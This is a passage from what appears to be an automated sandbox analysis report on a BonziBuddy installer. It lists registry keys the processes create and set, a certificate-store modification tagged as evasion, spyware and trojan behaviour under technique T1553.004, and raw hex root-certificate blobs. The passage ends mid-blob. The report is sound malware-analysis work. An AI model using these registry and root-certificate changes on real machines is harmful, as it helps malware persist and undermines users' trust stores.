Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinLabel\CurVer\ = "ActiveSkin.SkinLabel.1"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2C247F23-8591-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{822DB1C0-8879-11D1-9EC6-00C04FD7081F}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.aca	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinEvent.1\ = "SkinEvent Class"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6CFC9BA1-FE87-11D2-9DCF-ED29FAFE371D}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BE3-7DE6-11D0-91FE-00C04FD701A5}\TypeLib\Version = "2.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D7A6D440-8872-11D1-9EC6-00C04FD7081F}\TypeLib\Version = "2.0"	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{28E4193C-F276-4568-BCDC-DD15D88FADCC}\TypeLib\ = "{F4900F5D-055F-11D4-8F9B-00104BA312D6}"	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{22DF5084-12BC-4C98-8044-4FAD06F4119A}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ = "IAppCommand"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE3-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{0DE86A57-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BA90C00-3910-11D1-ACB3-00C04FD97575}\TypeLib	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinPanel.1\CLSID	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE11629C-36DF-11D3-9DD0-89D6DBBBA800}\MiscStatus\1	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E3867AA-8586-11D1-B16A-00C0F0283628}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\BonziBUDDY.CCalendarVBPeriod\Clsid	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods\ = "4"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{972DE6C1-8B09-11D2-B652-A1FD6CC34260}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ListViewCtrl.2\CLSID	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA664-8594-11D1-B16A-00C0F0283628}\TypeLib	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\ = "Winsock General Property Page Object"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F581B2D6-E4C3-40BF-8A1E-F68CDFD8FEEC}\ProxyStubClsid32	BonziBDY_4.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00E212A0-E66D-11CD-836C-0000C0C14E92}\ProxyStubClsid32	BonziBuddy432.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5BE8BD2-7DE6-11D0-91FE-00C04FD701A5}\MiscStatus\1	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\PROGID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60355531-5BFD-45AB-942C-7912628752C7}	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D4A-2CDD-11D3-9DD0-D3CD4078982A}\ProgID	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{48E59290-9880-11CF-9754-00AA00C00908}\1.0\0\win32\ = "C:\\Program Files (x86)\\BonziBuddy432\\MSINET.OCX"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B0913410-3B44-11D1-ACBA-00C04FD97575}\TypeLib\Version = "2.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.43\\msedgeupdate.dll,-3000"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{920FF31F-CA25-451A-9738-3444FC206BCC}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveTabs.SSTabPanel.2	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B0913410-3B44-11D1-ACBA-00C04FD97575}\ = "IAgentCtlCommandEx"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\ProgID	BonziBuddy432.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE37-8596-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F053-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BE1-7DE6-11D0-91FE-00C04FD701A5}\ = "IAgentCtlCommands"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\NumMethods	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D41-2CDD-11D3-9DD0-D3CD4078982A}\MiscStatus\1\ = "139665"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ = "IListView"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.SkinScrollBar.1\CLSID\ = "{53FA8D4D-2CDD-11D3-9DD0-D3CD4078982A}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\ProgID	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BA90C00-3910-11D1-ACB3-00C04FD97575}\ProxyStubClsid32	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{322982E1-0855-11D3-9DCF-DDFB3AB09E18}\ProgID\ = "ActiveSkin.ComMorph.1"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D4E-2CDD-11D3-9DD0-D3CD4078982A}\TypeLib\ = "{972DE6B5-8B09-11D2-B652-A1FD6CC34260}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FE2-1BF9-11D2-BAE8-00104B9E0792}\ProxyStubClsid32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A45DB4F-BD0D-11D2-8D14-00104B9E072A}\Implemented Categories\{0DE86A53-2BAA-11CF-A229-00AA003D7352}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\NumMethods	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ = "IBrowserHttpRequest2"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ = "IRegistrationUpdateHook"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{48E59291-9880-11CF-9754-00AA00C00908}	BonziBuddy432.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad